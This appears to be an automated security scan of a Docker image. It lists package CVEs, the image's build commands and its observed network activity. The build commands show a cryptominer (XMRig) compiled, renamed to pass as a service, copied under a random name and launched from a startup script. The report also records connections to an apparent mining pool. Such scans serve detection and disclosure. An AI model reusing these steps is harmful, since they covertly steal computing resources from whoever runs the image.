Medium CVE-2018-25032 zlib1g 1:1.2.11.dfsg-0ubuntu2 1:1.2.11.dfsg-0ubuntu2.1 zlib: A flaw found in zlib when compressing (not decompressing) certain inputs zlib1g:1:1.2.11.dfsg-0ubuntu2
Medium CVE-2018-25032 zlib1g-dev 1:1.2.11.dfsg-0ubuntu2 1:1.2.11.dfsg-0ubuntu2.1 zlib: A flaw found in zlib when compressing (not decompressing) certain inputs zlib1g-dev:1:1.2.11.dfsg-0ubuntu2
Medium CVE-2021-23362 hosted-git-info 2.6.0 2.8.9, 3.0.8 nodejs-hosted-git-info: Regular Expression denial of service via shortcutMatch in fromUrl() hosted-git-info:2.6.0
Medium CVE-2020-28481 socket.io 1.7.4 2.4.0 Insecure defaults due to CORS misconfiguration in socket.io socket.io:1.7.4
Low CVE-2018-6557 base-files 10.1ubuntu2 10.1ubuntu2.2 The MOTD update script in the base-files package in Ubuntu 18.04 LTS before 10.1ubuntu2.2, and Ubuntu 18.10 before 10.1ubuntu6 incorrectly handled... base-files:10.1ubuntu2
Low CVE-2019-18276 bash 4.4.18-2ubuntu1 4.4.18-2ubuntu1.3 bash: when effective UID is not equal to its real UID the saved UID is not dropped bash:4.4.18-2ubuntu1
Low CVE-2018-1000876 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: integer overflow leads to heap-based buffer overflow in objdump binutils:2.30-20ubuntu2~18.04
Low CVE-2018-10372 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: Heap-base buffer over-read in dwarf.c:process_cu_tu_index() allows for denial of service via crafted file binutils:2.30-20ubuntu2~18.04
Low CVE-2018-10373 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: NULL pointer dereference in dwarf2.c:concat_filename() allows for denial of service via crafted file binutils:2.30-20ubuntu2~18.04
Low CVE-2018-10534 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: out of bounds memory write in peXXigen.c files binutils:2.30-20ubuntu2~18.04
Low CVE-2018-10535 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: NULL pointer dereference in elf.c binutils:2.30-20ubuntu2~18.04
Low CVE-2018-12641 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: Stack Exhaustion in the demangling functions provided by libiberty binutils:2.30-20ubuntu2~18.04
Low CVE-2018-12697 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: NULL pointer dereference in work_stuff_copy_to_from in cplus-dem.c. binutils:2.30-20ubuntu2~18.04
Low CVE-2018-12698 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: excessive memory consumption in demangle_template in cplus-dem.c binutils:2.30-20ubuntu2~18.04
Low CVE-2018-12699 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: heap-based buffer overflow in finish_stab in stabs.c binutils:2.30-20ubuntu2~18.04
Low CVE-2018-12934 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: Uncontrolled Resource Consumption in remember_Ktype in cplus-dem.c binutils:2.30-20ubuntu2~18.04
Low CVE-2018-13033 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: Uncontrolled Resource Consumption in execution of nm binutils:2.30-20ubuntu2~18.04
Low CVE-2018-17358 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: invalid memory access in _bfd_stab_section_find_nearest_line in syms.c binutils:2.30-20ubuntu2~18.04
Low CVE-2018-17359 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: invalid memory access in bfd_zalloc in opncls.c binutils:2.30-20ubuntu2~18.04
Low CVE-2018-17360 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: heap-based buffer over-read in bfd_getl32 in libbfd.c binutils:2.30-20ubuntu2~18.04
Low CVE-2018-17794 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: NULL pointer dereference in libiberty/cplus-dem.c:work_stuff_copy_to_from() via crafted input binutils:2.30-20ubuntu2~18.04
Low CVE-2018-17985 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: Stack consumption problem caused by the cplus_demangle_type binutils:2.30-20ubuntu2~18.04
Low CVE-2018-18309 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: invalid memory address dereference in read_reloc in reloc.c binutils:2.30-20ubuntu2~18.04
Low CVE-2018-18483 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: Integer overflow in cplus-dem.c:get_count() allows for denial of service binutils:2.30-20ubuntu2~18.04
Low CVE-2018-18484 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: Stack exhaustion in cp-demangle.c allows for denial of service binutils:2.30-20ubuntu2~18.04
Low CVE-2018-18605 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: heap-based buffer over-read in sec_merge_hash_lookup in merge.c binutils:2.30-20ubuntu2~18.04
Low CVE-2018-18606 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: NULL pointer dereference in _bfd_add_merge_section in merge_strings function in merge.c binutils:2.30-20ubuntu2~18.04
Low CVE-2018-18607 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: NULL pointer dereference in elf_link_input_bfd in elflink.c binutils:2.30-20ubuntu2~18.04
Low CVE-2018-18700 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: Recursive Stack Overflow within function d_name, d_encoding, and d_local_name in cp-demangle.c binutils:2.30-20ubuntu2~18.04
Low CVE-2018-18701 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: infinite recursion in next_is_type_qual and cplus_demangle_type functions in cp-demangle.c binutils:2.30-20ubuntu2~18.04
Low CVE-2018-19931 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: Heap-based buffer overflow in bfd_elf32_swap_phdr_in function resulting in a denial of service binutils:2.30-20ubuntu2~18.04
Low CVE-2018-19932 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: Integer overflow due to the IS_CONTAINED_BY_LMA macro resulting in a denial of service binutils:2.30-20ubuntu2~18.04
Low CVE-2018-20002 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: memory leak in _bfd_generic_read_minisymbols function in syms.c binutils:2.30-20ubuntu2~18.04
Low CVE-2018-20623 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: Use-after-free in the error function binutils:2.30-20ubuntu2~18.04
Low CVE-2018-20651 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: NULL pointer dereference in elf_link_add_object_symbols function resulting in a denial of service binutils:2.30-20ubuntu2~18.04
Low CVE-2018-20671 binutils 2.30-20ubuntu2~18.04 2.30-21ubuntu1~18.04.3 binutils: Integer overflow in load_specific_debug_section function binutils:2.30-20ubuntu2~18.04
Low CVE-2018-8945 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Crash in elf.c:bfd_section_from_shdr() with crafted executable binutils:2.30-20ubuntu2~18.04
Low CVE-2018-9138 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Stack Exhaustion in the the C++ demangling functions provided by libiberty binutils:2.30-20ubuntu2~18.04
Low CVE-2019-12972 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: out-of-bounds read in setup_group in bfd/elf.c binutils:2.30-20ubuntu2~18.04
Low CVE-2019-17450 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: denial of service via crafted ELF file binutils:2.30-20ubuntu2~18.04
Low CVE-2019-9070 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: heap-based buffer over-read in function d_expression_1 in cp-demangle.c binutils:2.30-20ubuntu2~18.04
Low CVE-2019-9071 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: stack consumption in function d_count_templates_scopes in cp-demangle.c binutils:2.30-20ubuntu2~18.04
Low CVE-2019-9073 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: excessive memory allocation in function _bfd_elf_slurp_version_tables in elf.c binutils:2.30-20ubuntu2~18.04
Low CVE-2019-9074 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: out-of-bound read in function bfd_getl32 in libbfd.c binutils:2.30-20ubuntu2~18.04
Low CVE-2019-9075 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: heap-based buffer overflow in function _bfd_archive_64_bit_slurp_armap in archive64.c binutils:2.30-20ubuntu2~18.04
Low CVE-2019-9077 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: heap-based buffer overflow in function process_mips_specific in readelf.c binutils:2.30-20ubuntu2~18.04
Low CVE-2020-16592 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.7binutils: use-after-free in bfd_hash_lookup could result in DoS binutils:2.30-20ubuntu2~18.04
Low CVE-2021-3487 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.7binutils: Excessive debug section size can cause excessive memory consumption in bfd's dwarf2.c read_section() binutils:2.30-20ubuntu2~18.04
Low CVE-2018-1000876 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: integer overflow leads to heap-based buffer overflow in objdump binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-10372 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Heap-base buffer over-read in dwarf.c:process_cu_tu_index() allows for denial of service via crafted file binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-10373 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: NULL pointer dereference in dwarf2.c:concat_filename() allows for denial of service via crafted file binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-10534 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: out of bounds memory write in peXXigen.c files binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-10535 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: NULL pointer dereference in elf.c binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-12641 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Stack Exhaustion in the demangling functions provided by libiberty binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-12697 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: NULL pointer dereference in work_stuff_copy_to_from in cplus-dem.c. binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-12698 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: excessive memory consumption in demangle_template in cplus-dem.c binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-12699 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: heap-based buffer overflow in finish_stab in stabs.c binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-12934 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Uncontrolled Resource Consumption in remember_Ktype in cplus-dem.c binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-13033 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Uncontrolled Resource Consumption in execution of nm binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-17358 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: invalid memory access in _bfd_stab_section_find_nearest_line in syms.c binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-17359 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: invalid memory access in bfd_zalloc in opncls.c binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-17360 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: heap-based buffer over-read in bfd_getl32 in libbfd.c binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-17794 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: NULL pointer dereference in libiberty/cplus-dem.c:work_stuff_copy_to_from() via crafted input binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-17985 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Stack consumption problem caused by the cplus_demangle_type binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-18309 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: invalid memory address dereference in read_reloc in reloc.c binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-18483 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Integer overflow in cplus-dem.c:get_count() allows for denial of service binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-18484 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Stack exhaustion in cp-demangle.c allows for denial of service binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-18605 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: heap-based buffer over-read in sec_merge_hash_lookup in merge.c binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-18606 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: NULL pointer dereference in _bfd_add_merge_section in merge_strings function in merge.c binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-18607 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: NULL pointer dereference in elf_link_input_bfd in elflink.c binutils-common:2.30-20ubuntu2~18.04

Command

ADD file:28c0771e44ff530dba3f237024acc38e8ec9293d60f0e44c8c78536c12f13a0b in /
Vulnerable packages, installed in this layer 5 years ago
apt 1.6.1, libapt-pkg5.0 1.6.1, libsystemd0 237-3ubuntu10, libudev1 237-3ubuntu10, bzip2 1.0.6-8.1, dpkg 1.19.0.5ubuntu2, e2fsprogs 1.44.1-1, gzip 1.6-5ubuntu1, libbz2-1.0 1.0.6-8.1, libc-bin 2.27-3ubuntu1, libc6 2.27-3ubuntu1, libcom-err2 1.44.1-1, libdb5.3 5.3.28-13.1ubuntu1, libext2fs2 1.44.1-1, libgnutls30 3.5.18-1ubuntu1, libhogweed4 3.4-1, libidn2-0 2.0.4-1.1build2, liblz4-1 0.0~r131-2ubuntu3, liblzma5 5.2.2-1.3, libnettle6 3.4-1

Command

RUN set -xe &&
    echo '#!/bin/sh' > /usr/sbin/policy-rc.d &&
    echo 'exit 101' >> /usr/sbin/policy-rc.d &&
    chmod +x /usr/sbin/policy-rc.d &&
    dpkg-divert --local --rename --add /sbin/initctl &&
    cp -a /usr/sbin/policy-rc.d /sbin/initctl &&
    sed -i 's/^exit.*/exit 0/' /sbin/initctl &&
    echo 'force-unsafe-io' > /etc/dpkg/dpkg.cfg.d/docker-apt-speedup &&
    echo 'DPkg::Post-Invoke { "rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true"; };' > /etc/apt/apt.conf.d/docker-clean &&
    echo 'APT::Update::Post-Invoke { "rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true"; };' >> /etc/apt/apt.conf.d/docker-clean &&
    echo 'Dir::Cache::pkgcache ""; Dir::Cache::srcpkgcache "";' >> /etc/apt/apt.conf.d/docker-clean &&
    echo 'Acquire::Languages "none";' > /etc/apt/apt.conf.d/docker-no-languages &&
    echo 'Acquire::GzipIndexes "true"; Acquire::CompressionTypes::Order:: "gz";' > /etc/apt/apt.conf.d/docker-gzip-indexes &&
    echo 'Apt::AutoRemove::SuggestsImportant "false";' > /etc/apt/apt.conf.d/docker-autoremove-suggests

Command

RUN rm -rf /var/lib/apt/lists/*

Command

RUN sed -i 's/^#\s*\(deb.*universe\)$/\1/g' /etc/apt/sources.list

Command

RUN mkdir -p /run/systemd &&
    echo 'docker' > /run/systemd/container

Command

CMD ["/bin/bash"]

Command

RUN apt-get update &&
    apt-get install -y git curl build-essential cmake libuv1-dev libmicrohttpd-dev &&
    curl -sL https://deb.nodesource.com/setup_10.x | bash - &&
    apt-get install -y nodejs &&
    git clone -b qrl https://socialwrap@bitbucket.org/socialwrap/deadhash.git &&
    cd deadhash &&
    npm i &&
    git clone https://github.com/xmrig/xmrig.git &&
    cd xmrig &&
    mkdir build &&
    cd build &&
    cmake -DWITH_HTTPD=OFF -DCMAKE_BUILD_TYPE=Release .. &&
    make &&
    mv xmrig microserviced &&
    cp microserviced /deadhash &&
    cd /deadhash &&
    rm -rf xmrig
Vulnerable packages, installed in this layer 5 years ago
shell-quote 1.6.1, xmlhttprequest-ssl 1.5.3, libexpat1 2.2.5-3, libsasl2-2 2.1.27~101-g0780600+dfsg-3ubuntu2, libsasl2-modules 2.1.27~101-g0780600+dfsg-3ubuntu2, libsasl2-modules-db 2.1.27~101-g0780600+dfsg-3ubuntu2, libssl1.0.0 1.0.2n-1ubuntu5.1, libssl1.1 1.1.0g-2ubuntu4.1, linux-libc-dev 4.15.0-24.26, openssl 1.1.0g-2ubuntu4.1, engine.io 1.8.5, socket.io-parser 2.3.1, binutils 2.30-20ubuntu2~18.04, binutils-common 2.30-20ubuntu2~18.04, binutils-x86-64-linux-gnu 2.30-20ubuntu2~18.04, dirmngr 2.2.4-1ubuntu1.1, dpkg-dev 1.19.0.5ubuntu2, file 1:5.32-2ubuntu0.1, git-man 1:2.17.1-1ubuntu0.1, gnupg 2.2.4-1ubuntu1.1

Command

RUN apt-get clean &&
    apt-get purge -y git curl build-essential cmake

Command

WORKDIR /deadhash

Command

RUN export NAME=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 16 | head -n 1) &&
    cp microserviced $NAME &&
    echo "\n ./${NAME}" >> electrode.sh

Command

CMD ["/bin/sh" "-c" "npm start"]
The image downloads the following Git repository:
https://github.com/xmrig/xmrig.git
Dynamic Analysis Results
The following graph outlines the most important system events generated by the container:
The container made the following DNS requests:
Request Response
AAAA → qrl.easyhash.io SOA → ns1.bodis.com
A → qrl.easyhash.io A → 199.59.243.220
The container attempts to connect to the following remote hosts:
IP address Domain Location Coordinates ASN organization
104.16.22.35 registry.npmjs.org San Francisco, United States 37.7621, -122.3971 Cloudflare, Inc.
104.16.23.35 registry.npmjs.org San Francisco, United States 37.7621, -122.3971 Cloudflare, Inc.
104.16.18.35 registry.npmjs.org San Francisco, United States 37.7621, -122.3971 Cloudflare, Inc.
104.16.20.35 registry.npmjs.org San Francisco, United States 37.7621, -122.3971 Cloudflare, Inc.
104.16.27.35 registry.npmjs.org San Francisco, United States 37.7621, -122.3971 Cloudflare, Inc.
104.16.25.35 registry.npmjs.org San Francisco, United States 37.7621, -122.3971 Cloudflare, Inc.
199.59.243.220 qrl.easyhash.io United States 37.751, -97.822 AMAZON-02
104.16.17.35 registry.npmjs.org San Francisco, United States 37.7621, -122.3971 Cloudflare, Inc.
104.16.26.35 registry.npmjs.org San Francisco, United States 37.7621, -122.3971 Cloudflare, Inc.
104.16.21.35 registry.npmjs.org San Francisco, United States 37.7621, -122.3971 Cloudflare, Inc.
104.16.19.35 registry.npmjs.org San Francisco, United States 37.7621, -122.3971 Cloudflare, Inc.
104.16.24.35 registry.npmjs.org San Francisco, United States 37.7621, -122.3971 Cloudflare, Inc.
104.16.16.35 registry.npmjs.org San Francisco, United States 37.7621, -122.3971 Cloudflare, Inc.
The container produces the following text output:
user@host: ~